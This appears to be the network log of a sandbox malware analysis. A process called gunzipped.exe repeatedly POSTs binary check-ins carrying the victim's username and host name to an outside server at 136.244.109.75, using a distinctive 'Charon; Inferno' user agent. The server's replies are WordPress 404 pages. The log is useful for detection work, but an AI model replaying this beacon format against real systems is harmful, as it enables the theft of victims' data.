                          Apr 17, 2024 03:17:11.898840904 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:12.797817945 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:11 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:12.797883034 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:12.797921896 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:12.797960997 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:12.798002958 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:12.798041105 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:12.798079014 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:12.798115969 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:12.798152924 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:12.798193932 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.549726136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:13.162928104 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:13.367156029 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:14.294023991 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:13 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:14.294083118 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:14.294121027 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:14.294159889 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:14.294198990 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:14.294240952 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:14.294282913 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:14.294322968 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:14.294363976 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:14.294404030 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.549727136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:14.663281918 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:14.871156931 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:15.817419052 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:14 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 